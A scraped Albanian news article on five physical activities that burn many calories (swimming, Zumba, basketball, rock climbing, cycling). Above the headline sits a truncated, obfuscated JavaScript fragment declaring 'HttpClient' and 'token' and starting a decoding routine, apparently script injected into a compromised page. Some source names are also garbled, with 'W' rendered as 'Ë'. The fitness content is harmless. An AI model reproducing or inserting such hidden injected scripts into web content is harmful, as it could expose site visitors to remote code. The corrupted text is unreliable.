;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Pesë aktivitete fizike që djegin më shumë kalori

By

Jo të gjithë janë adhurues të të shkuarit në palestër, por nuk është e nevojshme nëse dëshironi të humbni peshë. Nëse jeni duke kërkuar një mënyrë të re për të djegur yndyrën më shpejt, ka disa aktivitete që mund t’ju ndihmojnë. Nga noti te çiklizmi, Index.hr përcjell pesë mënyra argëtuese për të hequr kilogramët.

Noti

Noti është një sport individual që angazhon të gjithë trupin dhe ndihmon në formësimin e muskujve. Sipas ËorldHealth, ju mund të digjni 367 deri në 404 kalori në vetëm 30 minuta not, transmeton Klankosova.tv.

Zumba

Për ata që kërkojnë një stërvitje argëtuese në grup, Zumba mund të jetë një opsion i shkëlqyeshëm. Është një lloj trajnimi aerobik me intensitet të lartë. Gjatë një stërvitje një orëshe Zumba, mund të digjni 500 deri në 800 kalori.

Basketbolli

Mblidhni shoqërinë dhe luani basketboll! Gjatë 30 minutave duke luajtur basketboll, një person që peshon 75 kilogramë mund të djegë rreth 288 kalori, sipas Harvard Health Publishing

Ngjitja në shkëmbinj

Ju këshillojmë të provoni këtë formë aktiviteti fizik. Sipas ËebMD, ngjitja në shkëmb është një ushtrim për të gjithë trupin që angazhon këmbët, krahët, muskujt e kraharorit dhe shpinën, duke ju detyruar të përdorni pothuajse çdo pjesë të trupit tuaj për t’u ngjitur.

Çiklizmi

Studimet kanë zbuluar se çiklizmi mund të përmirësojë shumë gjendjen fizike, të rrisë ndjeshmërinë ndaj insulinës dhe të zvogëlojë rrezikun e sëmundjeve të zemrës, kancerit dhe madje edhe vdekjes. Harvard Health Publishing thotë se një xhiro 30-minutëshe me biçikletë mund të djeg nga 210 deri në 440 kalori.

Artikuj të ngjashëm